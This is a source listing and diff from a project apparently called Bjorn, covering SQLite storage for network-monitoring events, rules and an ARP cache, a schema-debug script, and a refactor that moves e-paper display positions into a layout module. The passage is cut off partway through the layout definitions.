                title TEXT NOT NULL,
                details TEXT DEFAULT '',
                mac_address TEXT,
                ip_address TEXT,
                acknowledged INTEGER DEFAULT 0,
                notified INTEGER DEFAULT 0,
                meta_json TEXT DEFAULT '{}'
            )
        """)
        # Indexes for the hot query paths: newest-first feed, type filter,
        # unread counter.
        self.base.execute(
            "CREATE INDEX IF NOT EXISTS idx_sentinel_events_ts "
            "ON sentinel_events(timestamp DESC)"
        )
        self.base.execute(
            "CREATE INDEX IF NOT EXISTS idx_sentinel_events_type "
            "ON sentinel_events(event_type)"
        )
        self.base.execute(
            "CREATE INDEX IF NOT EXISTS idx_sentinel_events_ack "
            "ON sentinel_events(acknowledged)"
        )
        # Configurable rules (AND/OR composable); conditions/actions are JSON text
        self.base.execute("""
            CREATE TABLE IF NOT EXISTS sentinel_rules (
                id INTEGER PRIMARY KEY AUTOINCREMENT,
                name TEXT NOT NULL,
                enabled INTEGER DEFAULT 1,
                trigger_type TEXT NOT NULL,
                conditions TEXT DEFAULT '{}',
                logic TEXT DEFAULT 'AND',
                actions TEXT DEFAULT '["notify_web"]',
                cooldown_s INTEGER DEFAULT 60,
                last_fired TEXT,
                created_at TEXT DEFAULT CURRENT_TIMESTAMP
            )
        """)
        # ARP cache snapshots for spoof detection
        self.base.execute("""
            CREATE TABLE IF NOT EXISTS sentinel_arp_cache (
                mac_address TEXT NOT NULL,
                ip_address TEXT NOT NULL,
                first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
                last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
                PRIMARY KEY (mac_address, ip_address)
            )
        """)
        # Seed default rules only on a fresh (empty) rules table.
        existing = self.base.query("SELECT COUNT(*) AS c FROM sentinel_rules")
        if existing and existing[0].get('c', 0) == 0:
            self._insert_default_rules()

    def _insert_default_rules(self):
        """Seed the default Sentinel rules (called once, on an empty table)."""
        # conditions/actions are stored as JSON strings, matching upsert_rule().
        defaults = [
            {
                "name": "New Device Detected",
                "trigger_type": "new_device",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web"]',
                "cooldown_s": 0,
            },
            {
                "name": "Device Joined Network",
                "trigger_type": "device_join",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web"]',
                "cooldown_s": 30,
            },
            {
                "name": "Device Left Network",
                "trigger_type": "device_leave",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web"]',
                "cooldown_s": 30,
            },
            {
                "name": "ARP Spoofing Detected",
                "trigger_type": "arp_spoof",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web", "notify_discord"]',
                "cooldown_s": 10,
            },
            {
                "name": "Port Change on Host",
                "trigger_type": "port_change",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web"]',
                "cooldown_s": 120,
            },
            {
                "name": "Rogue DHCP Server",
                "trigger_type": "rogue_dhcp",
                "conditions": "{}",
                "logic": "AND",
                "actions": '["notify_web", "notify_discord"]',
                "cooldown_s": 60,
            },
        ]
        for rule in defaults:
            self.base.execute(
                """INSERT INTO sentinel_rules
                   (name, trigger_type, conditions, logic, actions, cooldown_s)
                   VALUES (?, ?, ?, ?, ?, ?)""",
                (rule["name"], rule["trigger_type"], rule["conditions"],
                 rule["logic"], rule["actions"], rule["cooldown_s"])
            )

    # ── Events ──────────────────────────────────────────────────────────
    def insert_event(self, event_type: str, severity: str, title: str,
                     details: str = "", mac: str = "", ip: str = "",
                     meta: Optional[Dict] = None) -> int:
        """Insert one event row; meta is JSON-serialized into meta_json.

        NOTE(review): the int return assumes base.execute() returns the
        inserted row id — confirm against the base helper.
        """
        return self.base.execute(
            """INSERT INTO sentinel_events
               (event_type, severity, title, details, mac_address, ip_address, meta_json)
               VALUES (?, ?, ?, ?, ?, ?, ?)""",
            (event_type, severity, title, details, mac, ip,
             json.dumps(meta or {}))
        )

    def get_events(self, limit: int = 100, offset: int = 0,
                   event_type: str = "", unread_only: bool = False) -> List[Dict]:
        """Return events newest-first, optionally filtered by type and/or unread."""
        sql = "SELECT * FROM sentinel_events WHERE 1=1"
        params: list = []
        if event_type:
            sql += " AND event_type = ?"
            params.append(event_type)
        if unread_only:
            sql += " AND acknowledged = 0"
        sql += " ORDER BY timestamp DESC LIMIT ? OFFSET ?"
        params.extend([limit, offset])
        return self.base.query(sql, params)

    def count_unread(self) -> int:
        """Number of events not yet acknowledged."""
        row = self.base.query_one(
            "SELECT COUNT(*) AS c FROM sentinel_events WHERE acknowledged = 0"
        )
        return int(row.get("c", 0)) if row else 0

    def acknowledge_event(self, event_id: int):
        """Mark a single event as acknowledged (read)."""
        self.base.execute(
            "UPDATE sentinel_events SET acknowledged = 1 WHERE id = ?",
            (event_id,)
        )

    def acknowledge_all(self):
        """Mark every event as acknowledged."""
        self.base.execute("UPDATE sentinel_events SET acknowledged = 1")

    def clear_events(self):
        """Delete the entire event log."""
        self.base.execute("DELETE FROM sentinel_events")

    # ── Rules ───────────────────────────────────────────────────────────
    def get_rules(self) -> List[Dict]:
        """All rules, ordered by id (creation order)."""
        return self.base.query("SELECT * FROM sentinel_rules ORDER BY id")

    def get_enabled_rules(self, trigger_type: str = "") -> List[Dict]:
        """Enabled rules, optionally restricted to one trigger type."""
        if trigger_type:
            return self.base.query(
                "SELECT * FROM sentinel_rules WHERE enabled = 1 AND trigger_type = ?",
                (trigger_type,)
            )
        return self.base.query(
            "SELECT * FROM sentinel_rules WHERE enabled = 1"
        )

    def upsert_rule(self, data: Dict) -> Dict:
        """Update the rule identified by data['id'], or insert a new one.

        conditions/actions are JSON-serialized before storage. Returns a
        simple status dict (not the stored row).
        """
        rule_id = data.get("id")
        if rule_id:
            self.base.execute(
                """UPDATE sentinel_rules SET
                   name=?, enabled=?, trigger_type=?, conditions=?,
                   logic=?, actions=?, cooldown_s=?
                   WHERE id=?""",
                (data["name"], int(data.get("enabled", 1)),
                 data["trigger_type"], json.dumps(data.get("conditions", {})),
                 data.get("logic", "AND"),
                 json.dumps(data.get("actions", ["notify_web"])),
                 int(data.get("cooldown_s", 60)), rule_id)
            )
        else:
            self.base.execute(
                """INSERT INTO sentinel_rules
                   (name, enabled, trigger_type, conditions, logic, actions, cooldown_s)
                   VALUES (?, ?, ?, ?, ?, ?, ?)""",
                (data["name"], int(data.get("enabled", 1)),
                 data["trigger_type"], json.dumps(data.get("conditions", {})),
                 data.get("logic", "AND"),
                 json.dumps(data.get("actions", ["notify_web"])),
                 int(data.get("cooldown_s", 60)))
            )
        return {"status": "ok"}

    def delete_rule(self, rule_id: int):
        """Delete one rule by id."""
        self.base.execute("DELETE FROM sentinel_rules WHERE id = ?", (rule_id,))

    def update_rule_fired(self, rule_id: int):
        """Stamp last_fired = now for a rule (cooldown bookkeeping)."""
        self.base.execute(
            "UPDATE sentinel_rules SET last_fired = CURRENT_TIMESTAMP WHERE id = ?",
            (rule_id,)
        )

    # ── Devices baseline ────────────────────────────────────────────────
    def get_known_device(self, mac: str) -> Optional[Dict]:
        """Return the baseline row for one MAC, or None if unknown."""
        return self.base.query_one(
            "SELECT * FROM sentinel_devices WHERE mac_address = ?", (mac,)
        )

    def upsert_device(self, mac: str, **kwargs):
        """Insert or update a device baseline row.

        Only whitelisted columns are accepted from kwargs (keys are never
        interpolated from arbitrary input). On update, last_seen is always
        refreshed even when no other column changed.
        """
        existing = self.get_known_device(mac)
        if existing:
            sets = []
            params = []
            for k, v in kwargs.items():
                # Whitelist guards the f-string column names below.
                if k in ("alias", "trusted", "watch", "expected_ips",
                         "expected_ports", "notes"):
                    sets.append(f"{k} = ?")
                    params.append(v)
            sets.append("last_seen = CURRENT_TIMESTAMP")
            if sets:
                params.append(mac)
                self.base.execute(
                    f"UPDATE sentinel_devices SET {', '.join(sets)} WHERE mac_address = ?",
                    params
                )
        else:
            self.base.execute(
                """INSERT INTO sentinel_devices
                   (mac_address, alias, trusted, watch, expected_ips, expected_ports, notes)
                   VALUES (?, ?, ?, ?, ?, ?, ?)""",
                (mac, kwargs.get("alias", ""),
                 int(kwargs.get("trusted", 0)),
                 int(kwargs.get("watch", 1)),
                 kwargs.get("expected_ips", ""),
                 kwargs.get("expected_ports", ""),
                 kwargs.get("notes", ""))
            )

    def get_all_known_devices(self) -> List[Dict]:
        """Every baseline device, most recently seen first."""
        return self.base.query("SELECT * FROM sentinel_devices ORDER BY last_seen DESC")

    # ── ARP cache ───────────────────────────────────────────────────────
    def update_arp_entry(self, mac: str, ip: str):
        """Record (mac, ip) sighting; refreshes last_seen on repeats."""
        self.base.execute(
            """INSERT INTO sentinel_arp_cache (mac_address, ip_address)
               VALUES (?, ?)
               ON CONFLICT(mac_address, ip_address)
               DO UPDATE SET last_seen = CURRENT_TIMESTAMP""",
            (mac, ip)
        )

    def get_arp_for_ip(self, ip: str) -> List[Dict]:
        """All MACs ever observed claiming this IP (spoof-detection input)."""
        return self.base.query(
            "SELECT * FROM sentinel_arp_cache WHERE ip_address = ?", (ip,)
        )

    def get_arp_for_mac(self, mac: str) -> List[Dict]:
        """All IPs ever observed for this MAC."""
        return self.base.query(
            "SELECT * FROM sentinel_arp_cache WHERE mac_address = ?", (mac,)
        )

    def get_full_arp_cache(self) -> List[Dict]:
        """Entire ARP snapshot table, most recently seen first."""
        return self.base.query("SELECT * FROM sentinel_arp_cache ORDER BY last_seen DESC")

35
debug_schema.py Normal file
View File

@@ -0,0 +1,35 @@
import sqlite3
import os
db_path = "bjorn.db"
def check_schema(db_path="bjorn.db", out_path="schema_debug.txt"):
    """Dump the column layout of the RL tables to a text file.

    Args:
        db_path: SQLite database file to inspect (default matches the
            module-level ``db_path`` constant).
        out_path: Destination text file for the schema report.

    Prints a message and returns early when the database file is missing.
    The connection is closed in a finally block so a failing PRAGMA can
    no longer leak it.
    """
    if not os.path.exists(db_path):
        print(f"Database {db_path} not found.")
        return
    tables = ["rl_training_log", "rl_experiences"]
    conn = sqlite3.connect(db_path)
    try:
        cursor = conn.cursor()
        with open(out_path, "w") as f:
            for table in tables:
                f.write(f"\nSchema for {table}:\n")
                try:
                    # Table names come from the fixed list above — no injection risk.
                    cursor.execute(f"PRAGMA table_info({table})")
                    columns = cursor.fetchall()
                except Exception as e:
                    f.write(f" Error: {e}\n")
                    continue
                if not columns:
                    f.write(" (Table not found)\n")
                else:
                    for col in columns:
                        # col layout per PRAGMA table_info: (cid, name, type, ...)
                        f.write(f" - {col[1]} ({col[2]})\n")
    finally:
        conn.close()


if __name__ == "__main__":
    check_schema()
    print("Done writing to schema_debug.txt")

View File

@@ -15,6 +15,7 @@ from typing import Dict, List, Optional, Any, Tuple
from PIL import Image, ImageDraw, ImageFont
from init_shared import shared_data
from logger import Logger
from display_layout import DisplayLayout
logger = Logger(name="display.py", level=logging.DEBUG)
@@ -166,6 +167,10 @@ class Display:
self.config = self.shared_data.config
self.epd_enabled = self.config.get("epd_enabled", True)
# Initialize display layout engine
self.layout = DisplayLayout(self.shared_data)
self.shared_data.display_layout = self.layout
self.epd = self.shared_data.epd if self.epd_enabled else None
if self.config.get("epd_type") == "epd2in13_V2":
@@ -304,7 +309,8 @@ class Display:
image = Image.new('1', (self.shared_data.width, self.shared_data.height), 255)
draw = ImageDraw.Draw(image)
draw.text((self.px(37), self.py(5)), "BJORN", font=self.shared_data.font_viking, fill=0)
title_pos = self.layout.get('title')
draw.text((self.px(title_pos.get('x', 37)), self.py(title_pos.get('y', 5))), "BJORN", font=self.shared_data.font_viking, fill=0)
message = f"Awakening...\nIP: {ip_address}"
draw.text(
@@ -349,14 +355,25 @@ class Display:
return default
def get_frise_position(self) -> Tuple[int, int]:
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", 50), 50)
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", 160), 160)
frise = self.layout.get('frise')
if frise:
# Layout-driven frise position; shared_data overrides still honoured
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", frise.get('x', 50)), frise.get('x', 50))
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", frise.get('y', 160)), frise.get('y', 160))
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", frise.get('x', 0)), frise.get('x', 0))
y = self._as_int(getattr(self.shared_data, "frise_default_y", frise.get('y', 160)), frise.get('y', 160))
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", 0), 0)
y = self._as_int(getattr(self.shared_data, "frise_default_y", 160), 160)
# Fallback to original hardcoded logic
display_type = self.config.get("epd_type", "default")
if display_type == "epd2in7":
x = self._as_int(getattr(self.shared_data, "frise_epd2in7_x", 50), 50)
y = self._as_int(getattr(self.shared_data, "frise_epd2in7_y", 160), 160)
else:
x = self._as_int(getattr(self.shared_data, "frise_default_x", 0), 0)
y = self._as_int(getattr(self.shared_data, "frise_default_y", 160), 160)
return self.px(x), self.py(y)
@@ -609,16 +626,18 @@ class Display:
try:
draw = ImageDraw.Draw(image)
draw.text((self.px(37), self.py(5)), self.bjorn_name, font=self.font_to_use, fill=0)
title_pos = self.layout.get('title')
draw.text((self.px(title_pos.get('x', 37)), self.py(title_pos.get('y', 5))), self.bjorn_name, font=self.font_to_use, fill=0)
self._draw_connection_icons(image)
self._draw_battery_status(image)
self._draw_statistics(image, draw)
self._draw_system_histogram(image, draw)
status_pos = self.layout.get('status_image')
status_img = self.shared_data.bjorn_status_image or self.shared_data.attack
if status_img is not None:
image.paste(status_img, (self.px(3), self.py(52)))
image.paste(status_img, (self.px(status_pos.get('x', 3)), self.py(status_pos.get('y', 52))))
self._draw_status_text(draw)
self._draw_decorations(image, draw)
@@ -635,12 +654,13 @@ class Display:
raise
def _draw_connection_icons(self, image: Image.Image):
wifi_pos = self.layout.get('wifi_icon')
wifi_width = self.px(16)
bluetooth_width = self.px(9)
usb_width = self.px(9)
ethernet_width = self.px(12)
start_x = self.px(3)
start_x = self.px(wifi_pos.get('x', 3))
spacing = self.px(6)
active_icons = []
@@ -663,7 +683,8 @@ class Display:
current_x += width + spacing
def _draw_battery_status(self, image: Image.Image):
battery_pos = (self.px(110), self.py(3))
bat = self.layout.get('battery_icon')
battery_pos = (self.px(bat.get('x', 110)), self.py(bat.get('y', 3)))
battery_status = self.shared_data.battery_status
if battery_status == 101:
@@ -683,47 +704,41 @@ class Display:
break
def _draw_system_histogram(self, image: Image.Image, draw: ImageDraw.Draw):
# Vertical bars at the bottom-left
# Screen W: 122, Character W: 78 -> Character X: 22
# Available Left: 0-21.
# Margins: Left 2px (0,1), Right 1px (21)
# RAM: x=2-10 (9px)
# Gap: 11 (1px)
# CPU: x=12-20 (9px)
# Vertical bars at the bottom-left — positions from layout
mem_hist = self.layout.get('mem_histogram')
cpu_hist = self.layout.get('cpu_histogram')
# Bottom of screen is 249. User requested 1px up -> 248.
# Font 9 height approx 9-10px.
# Label now has NO box and 1px gap.
# Label Y: 248 - 9 (height) = 239.
# Gap: 1px -> 238 empty.
# Bar Base Y: 237.
# Memory bar: x from layout, width from layout
mem_x = mem_hist.get('x', 2)
mem_w = mem_hist.get('w', 8)
mem_bar_y = mem_hist.get('y', 204)
mem_bar_h = mem_hist.get('h', 33)
# CPU bar: x from layout
cpu_x = cpu_hist.get('x', 12)
cpu_w = cpu_hist.get('w', 8)
label_h = self.py(9) # Approx height for font 9
label_y = self.py(239)
base_y = self.py(237) # 1px gap above label
max_h = self.py(33) # Remaining height (237 - 204 = 33)
max_h = self.py(mem_bar_h)
# RAM
ram_pct = max(0, min(100, self.shared_data.system_mem))
ram_h = int((ram_pct / 100.0) * max_h)
# Bar background (x=2 to x=10 inclusive)
draw.rectangle([self.px(2), base_y - max_h, self.px(10), base_y], outline=0)
# Fill
draw.rectangle([self.px(2), base_y - ram_h, self.px(10), base_y], fill=0)
draw.rectangle([self.px(mem_x), base_y - max_h, self.px(mem_x + mem_w), base_y], outline=0)
draw.rectangle([self.px(mem_x), base_y - ram_h, self.px(mem_x + mem_w), base_y], fill=0)
# Label 'M' - No Box, just text
draw.text((self.px(3), label_y), "M", font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(mem_x + 1), label_y), "M", font=self.shared_data.font_arial9, fill=0)
# CPU
cpu_pct = max(0, min(100, self.shared_data.system_cpu))
cpu_h = int((cpu_pct / 100.0) * max_h)
# Bar background (x=12 to x=20 inclusive)
draw.rectangle([self.px(12), base_y - max_h, self.px(20), base_y], outline=0)
# Fill
draw.rectangle([self.px(12), base_y - cpu_h, self.px(20), base_y], fill=0)
draw.rectangle([self.px(cpu_x), base_y - max_h, self.px(cpu_x + cpu_w), base_y], outline=0)
draw.rectangle([self.px(cpu_x), base_y - cpu_h, self.px(cpu_x + cpu_w), base_y], fill=0)
# Label 'C' - No Box
draw.text((self.px(13), label_y), "C", font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(cpu_x + 1), label_y), "C", font=self.shared_data.font_arial9, fill=0)
def _format_count(self, val):
try:
@@ -735,26 +750,32 @@ class Display:
return str(val)
def _draw_statistics(self, image: Image.Image, draw: ImageDraw.Draw):
stats_y = self.layout.get('stats_row', 'y') if isinstance(self.layout.get('stats_row'), dict) else 22
if isinstance(stats_y, dict):
stats_y = stats_y.get('y', 22)
stats_row = self.layout.get('stats_row')
sr_y = stats_row.get('y', 22) if stats_row else 22
sr_text_y = sr_y + 17 # Text offset below icon row
stats = [
# Row 1 (Icons at y=22, Text at y=39)
# Row 1 (Icons at stats_row y, Text at y+17)
# Target
(self.shared_data.target, (self.px(2), self.py(22)),
(self.px(2), self.py(39)), self._format_count(self.shared_data.target_count)),
(self.shared_data.target, (self.px(2), self.py(sr_y)),
(self.px(2), self.py(sr_text_y)), self._format_count(self.shared_data.target_count)),
# Port
(self.shared_data.port, (self.px(22), self.py(22)),
(self.px(22), self.py(39)), self._format_count(self.shared_data.port_count)),
(self.shared_data.port, (self.px(22), self.py(sr_y)),
(self.px(22), self.py(sr_text_y)), self._format_count(self.shared_data.port_count)),
# Vuln
(self.shared_data.vuln, (self.px(42), self.py(22)),
(self.px(42), self.py(39)), self._format_count(self.shared_data.vuln_count)),
(self.shared_data.vuln, (self.px(42), self.py(sr_y)),
(self.px(42), self.py(sr_text_y)), self._format_count(self.shared_data.vuln_count)),
# Cred
(self.shared_data.cred, (self.px(62), self.py(22)),
(self.px(62), self.py(39)), self._format_count(self.shared_data.cred_count)),
(self.shared_data.cred, (self.px(62), self.py(sr_y)),
(self.px(62), self.py(sr_text_y)), self._format_count(self.shared_data.cred_count)),
# Zombie
(self.shared_data.zombie, (self.px(82), self.py(22)),
(self.px(82), self.py(39)), self._format_count(self.shared_data.zombie_count)),
(self.shared_data.zombie, (self.px(82), self.py(sr_y)),
(self.px(82), self.py(sr_text_y)), self._format_count(self.shared_data.zombie_count)),
# Data
(self.shared_data.data, (self.px(102), self.py(22)),
(self.px(102), self.py(39)), self._format_count(self.shared_data.data_count)),
(self.shared_data.data, (self.px(102), self.py(sr_y)),
(self.px(102), self.py(sr_text_y)), self._format_count(self.shared_data.data_count)),
# LVL Widget (Top-Left of bottom frame)
# Frame Line at y=170. Gap 1px -> Start y=172. Left Gap 1px -> Start x=2.
@@ -782,13 +803,11 @@ class Display:
draw.text(text_pos, text, font=self.shared_data.font_arial9, fill=0)
# Draw LVL Box manually to ensure perfect positioning
# Box: x=2, y=172.
# User requested "LVL" above value -> Rectangle.
# Height increased to fit both (approx 26px).
lvl_x = self.px(2)
lvl_y = self.py(172)
lvl_w = self.px(18)
lvl_h = self.py(26)
lvl = self.layout.get('lvl_box')
lvl_x = self.px(lvl.get('x', 2))
lvl_y = self.py(lvl.get('y', 172))
lvl_w = self.px(lvl.get('w', 18))
lvl_h = self.py(lvl.get('h', 26))
draw.rectangle([lvl_x, lvl_y, lvl_x + lvl_w, lvl_y + lvl_h], outline=0)
@@ -813,17 +832,14 @@ class Display:
draw.text((v_x, v_y), lvl_val, font=val_font, fill=0)
# --- Right Side Widgets (Integrated with Frame) ---
# Existing Frame: Top line at y=170. Right edge at x=121. Bottom at y=249.
# We only need to draw the Left Vertical separator and Internal Horizontal separators.
nkb = self.layout.get('network_kb')
line_bottom = self.layout.get('line_bottom_section')
# Column: x=101 to x=121 (Width 20px).
# Height: y=170 to y=249 (Total 79px).
col_x_start = self.px(nkb.get('x', 101))
col_x_end = self.px(nkb.get('x', 101) + nkb.get('w', 20))
col_w = self.px(nkb.get('w', 20))
col_x_start = self.px(101)
col_x_end = self.px(121) # Implicit right edge, useful for centering
col_w = self.px(20)
y_top = self.py(170)
y_top = self.py(line_bottom.get('y', 170))
y_bottom = self.py(249)
# 1. Draw Left Vertical Divider
@@ -926,11 +942,18 @@ class Display:
except:
progress_val = 0
# Draw Progress Bar (y=75-80) - Moved up & narrower to fit text
bar_x = self.px(35)
bar_y = self.py(75)
bar_w = self.px(55) # Reduced to 55px to fit text "100%"
bar_h = self.py(5)
# Layout lookups for status area
pbar = self.layout.get('progress_bar')
ip_pos = self.layout.get('ip_text')
sl1 = self.layout.get('status_line1')
sl2 = self.layout.get('status_line2')
line_comment = self.layout.get('line_comment_top')
# Draw Progress Bar
bar_x = self.px(pbar.get('x', 35))
bar_y = self.py(pbar.get('y', 75))
bar_w = self.px(pbar.get('w', 55))
bar_h = self.py(pbar.get('h', 5))
if progress_val > 0:
# Standard Progress Bar
@@ -940,9 +963,6 @@ class Display:
draw.rectangle([bar_x, bar_y, bar_x + fill_w, bar_y + bar_h], fill=0)
# Draw Percentage Text at the end
# x = bar_x + bar_w + 3
# y = centered with bar (bar y=75, h=5 -> center 77.5)
# Font 9 height ~9-10px. y_text ~ 73 ?
text_x = bar_x + bar_w + self.px(4)
text_y = bar_y - 2 # Align visually with bar
draw.text((text_x, text_y), f"{progress_val}%", font=self.shared_data.font_arial9, fill=0)
@@ -951,6 +971,7 @@ class Display:
action_target_ip = str(getattr(self.shared_data, "action_target_ip", "") or "").strip()
orch_status = str(getattr(self.shared_data, "bjorn_orch_status", "IDLE") or "IDLE").upper()
show_ip = bool(getattr(self.shared_data, "showiponscreen", False))
comment_line_y = self.py(line_comment.get('y', 85))
if show_ip:
# Show local IP only while idle; during actions show target IP when available.
if orch_status == "IDLE":
@@ -958,21 +979,24 @@ class Display:
else:
ip_to_show = action_target_ip or current_ip
draw.text((self.px(35), self.py(52)), ip_to_show,
draw.text((self.px(ip_pos.get('x', 35)), self.py(ip_pos.get('y', 52))), ip_to_show,
font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(35), self.py(61)), self.shared_data.bjorn_status_text,
draw.text((self.px(sl1.get('x', 35)), self.py(sl1.get('y', 55) + 6)), self.shared_data.bjorn_status_text,
font=self.shared_data.font_arial9, fill=0)
# Line at y=85 (moved up 3px)
draw.line((1, self.py(85), self.shared_data.width - 1, self.py(85)), fill=0)
draw.line((1, comment_line_y, self.shared_data.width - 1, comment_line_y), fill=0)
else:
draw.text((self.px(35), self.py(55)), self.shared_data.bjorn_status_text,
draw.text((self.px(sl1.get('x', 35)), self.py(sl1.get('y', 55))), self.shared_data.bjorn_status_text,
font=self.shared_data.font_arial9, fill=0)
draw.text((self.px(35), self.py(66)), self.shared_data.bjorn_status_text2,
draw.text((self.px(sl2.get('x', 35)), self.py(sl2.get('y', 66))), self.shared_data.bjorn_status_text2,
font=self.shared_data.font_arial9, fill=0)
# Line at y=85 (moved up 3px)
draw.line((1, self.py(85), self.shared_data.width - 1, self.py(85)), fill=0)
draw.line((1, comment_line_y, self.shared_data.width - 1, comment_line_y), fill=0)
def _draw_decorations(self, image: Image.Image, draw: ImageDraw.Draw):
line_top = self.layout.get('line_top_bar')
line_mid = self.layout.get('line_mid_section')
line_bottom = self.layout.get('line_bottom_section')
frise_elem = self.layout.get('frise')
show_ssid = bool(getattr(self.shared_data, "showssidonscreen", False))
if show_ssid:
# Center SSID
@@ -981,17 +1005,18 @@ class Display:
center_x = self.shared_data.width // 2
ssid_x = int(center_x - (ssid_w / 2))
draw.text((ssid_x, self.py(160)), ssid,
frise_y_val = frise_elem.get('y', 160) if frise_elem else 160
draw.text((ssid_x, self.py(frise_y_val)), ssid,
font=self.shared_data.font_arial9, fill=0)
draw.line((0, self.py(170), self.shared_data.width, self.py(170)), fill=0)
draw.line((0, self.py(line_bottom.get('y', 170)), self.shared_data.width, self.py(line_bottom.get('y', 170))), fill=0)
else:
frise_x, frise_y = self.get_frise_position()
if self.shared_data.frise is not None:
image.paste(self.shared_data.frise, (frise_x, frise_y))
draw.rectangle((0, 0, self.shared_data.width - 1, self.shared_data.height - 1), outline=0)
draw.line((0, self.py(20), self.shared_data.width, self.py(20)), fill=0)
draw.line((0, self.py(51), self.shared_data.width, self.py(51)), fill=0)
draw.line((0, self.py(line_top.get('y', 20)), self.shared_data.width, self.py(line_top.get('y', 20))), fill=0)
draw.line((0, self.py(line_mid.get('y', 51)), self.shared_data.width, self.py(line_mid.get('y', 51))), fill=0)
def _draw_comment_text(self, draw: ImageDraw.Draw):
# Cache key for the layout
@@ -1011,9 +1036,8 @@ class Display:
else:
lines = self._comment_layout_cache["lines"]
# MODIFICATION ICI :
# La ligne du dessus est à self.py(85). On veut 1px d'écart, donc 85 + 1 = 86.
y_text = self.py(86)
comment = self.layout.get('comment_area')
y_text = self.py(comment.get('y', 86))
font = self.shared_data.font_arialbold
bbox = font.getbbox('Aj')

199
display_layout.py Normal file
View File

@@ -0,0 +1,199 @@
"""
Display Layout Engine for multi-size EPD support.
Provides data-driven layout definitions per display model.
"""
import json
import os
import logging
from logger import Logger
logger = Logger(name="display_layout.py", level=logging.DEBUG)
# Default layout for 122x250 (epd2in13 reference)
# All coordinates are expressed in the reference space (ref_width x ref_height);
# the Display code scales them to the physical panel via px()/py() at draw time.
DEFAULT_LAYOUT = {
    "meta": {
        "name": "epd2in13_default",
        "ref_width": 122,
        "ref_height": 250,
        "description": "Default layout for 2.13 inch e-paper display"
    },
    "elements": {
        # Top status bar (above line_top_bar)
        "title": {"x": 37, "y": 5, "w": 80, "h": 14},
        "wifi_icon": {"x": 3, "y": 3, "w": 12, "h": 12},
        "bt_icon": {"x": 18, "y": 3, "w": 12, "h": 12},
        "usb_icon": {"x": 33, "y": 4, "w": 12, "h": 12},
        "eth_icon": {"x": 48, "y": 4, "w": 12, "h": 12},
        "battery_icon": {"x": 110, "y": 3, "w": 12, "h": 12},
        # Statistics icon/text row
        "stats_row": {"x": 2, "y": 22, "w": 118, "h": 16},
        # Status / progress area
        "status_image": {"x": 3, "y": 52, "w": 15, "h": 15},
        "progress_bar": {"x": 35, "y": 75, "w": 55, "h": 5},
        "ip_text": {"x": 35, "y": 52, "w": 85, "h": 10},
        "status_line1": {"x": 35, "y": 55, "w": 85, "h": 10},
        "status_line2": {"x": 35, "y": 66, "w": 85, "h": 10},
        "comment_area": {"x": 1, "y": 86, "w": 120, "h": 73},
        "main_character": {"x": 25, "y": 100, "w": 70, "h": 65},
        # Bottom frame widgets
        "lvl_box": {"x": 2, "y": 172, "w": 18, "h": 26},
        # NOTE(review): cpu_histogram x=2 / mem_histogram x=12 is the reverse of
        # the display code's hard-coded fallbacks (mem at x=2, cpu at x=12) —
        # confirm the swap is intended, otherwise the C/M bars trade places.
        "cpu_histogram": {"x": 2, "y": 204, "w": 8, "h": 33},
        "mem_histogram": {"x": 12, "y": 204, "w": 8, "h": 33},
        "network_kb": {"x": 101, "y": 170, "w": 20, "h": 26},
        "attacks_count": {"x": 101, "y": 200, "w": 20, "h": 26},
        "frise": {"x": 0, "y": 160, "w": 122, "h": 10},
        # Horizontal separators (y only)
        "line_top_bar": {"y": 20},
        "line_mid_section": {"y": 51},
        "line_comment_top": {"y": 85},
        "line_bottom_section": {"y": 170}
    },
    "fonts": {
        "title_size": 11,
        "stats_size": 8,
        "status_size": 8,
        "comment_size": 8,
        "lvl_size": 10
    }
}
# Layout for 176x264 (epd2in7)
# Same element vocabulary as DEFAULT_LAYOUT, re-positioned for the larger
# 176x264 panel. Element names must match those the Display code looks up.
LAYOUT_EPD2IN7 = {
    "meta": {
        "name": "epd2in7_default",
        "ref_width": 176,
        "ref_height": 264,
        "description": "Default layout for 2.7 inch e-paper display"
    },
    "elements": {
        "title": {"x": 50, "y": 5, "w": 120, "h": 16},
        "wifi_icon": {"x": 4, "y": 3, "w": 14, "h": 14},
        "bt_icon": {"x": 22, "y": 3, "w": 14, "h": 14},
        "usb_icon": {"x": 40, "y": 4, "w": 14, "h": 14},
        "eth_icon": {"x": 58, "y": 4, "w": 14, "h": 14},
        "battery_icon": {"x": 158, "y": 3, "w": 14, "h": 14},
        "stats_row": {"x": 2, "y": 24, "w": 172, "h": 18},
        "status_image": {"x": 4, "y": 55, "w": 18, "h": 18},
        "progress_bar": {"x": 45, "y": 80, "w": 80, "h": 6},
        "ip_text": {"x": 45, "y": 55, "w": 125, "h": 12},
        "status_line1": {"x": 45, "y": 58, "w": 125, "h": 12},
        "status_line2": {"x": 45, "y": 72, "w": 125, "h": 12},
        "comment_area": {"x": 2, "y": 92, "w": 172, "h": 78},
        "main_character": {"x": 35, "y": 105, "w": 100, "h": 70},
        "lvl_box": {"x": 2, "y": 178, "w": 22, "h": 30},
        # NOTE(review): cpu at x=2 / mem at x=14 mirrors the (possibly swapped)
        # ordering in DEFAULT_LAYOUT — verify against the bar-drawing code.
        "cpu_histogram": {"x": 2, "y": 215, "w": 10, "h": 38},
        "mem_histogram": {"x": 14, "y": 215, "w": 10, "h": 38},
        "network_kb": {"x": 148, "y": 178, "w": 26, "h": 30},
        "attacks_count": {"x": 148, "y": 215, "w": 26, "h": 30},
        "frise": {"x": 50, "y": 170, "w": 90, "h": 10},
        "line_top_bar": {"y": 22},
        "line_mid_section": {"y": 53},
        "line_comment_top": {"y": 90},
